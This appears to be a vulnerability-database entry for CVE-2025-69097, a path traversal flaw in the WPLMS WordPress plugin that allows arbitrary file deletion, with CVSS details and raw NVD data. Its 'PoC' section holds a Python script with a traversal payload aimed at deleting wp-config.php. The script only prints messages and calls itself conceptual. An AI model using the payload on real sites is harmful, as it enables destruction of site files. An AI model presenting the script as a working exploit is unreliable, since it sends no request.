Security Vulnerability Report
中文
CVE-2025-69097 CVSS 8.6 HIGH

CVE-2025-69097

Published: 2026-01-22 17:16:22
Last Modified: 2026-04-27 20:16:27

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in VibeThemes WPLMS wplms_plugin allows Path Traversal.This issue affects WPLMS: from n/a through <= 1.9.9.5.4.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WPLMS wplms_plugin <= 1.9.9.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69097 PoC - WPLMS Path Traversal File Deletion # Target: WordPress with WPLMS plugin <= 1.9.9.5.4 import requests import sys target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" # Path traversal payload to delete wp-config.php # Adjust the number of ../ based on the directory structure payload = "../../../../wp-config.php" # Try to exploit the path traversal vulnerability # The actual endpoint depends on the vulnerable function in WPLMS endpoints = [ "/wp-admin/admin-ajax.php", "/wp-content/plugins/wplms_plugin/includes/", ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded", } # Note: This is a conceptual PoC. Actual exploitation requires identifying # the specific vulnerable endpoint in the WPLMS plugin. # The vulnerability allows unauthenticated path traversal leading to file deletion. print(f"[*] Target: {target_url}") print(f"[*] Vulnerability: Path Traversal in WPLMS <= 1.9.9.5.4") print(f"[*] Impact: Arbitrary file deletion") print("\n[!] This PoC demonstrates the vulnerability concept.") print("[!] Actual exploitation requires finding the vulnerable function.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69097", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:22.437", "lastModified": "2026-04-27T20:16:27.243", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in VibeThemes WPLMS wplms_plugin allows Path Traversal.This issue affects WPLMS: from n/a through <= 1.9.9.5.4."}, {"lang": "es", "value": "Vulnerabilidad de limitación inadecuada de un nombre de ruta a un directorio restringido ('salto de ruta') en el plugin wplms_plugin de VibeThemes WPLMS permite salto de ruta. Este problema afecta a WPLMS: desde n/d hasta &lt;= 1.9.9.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wplms_plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-4-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}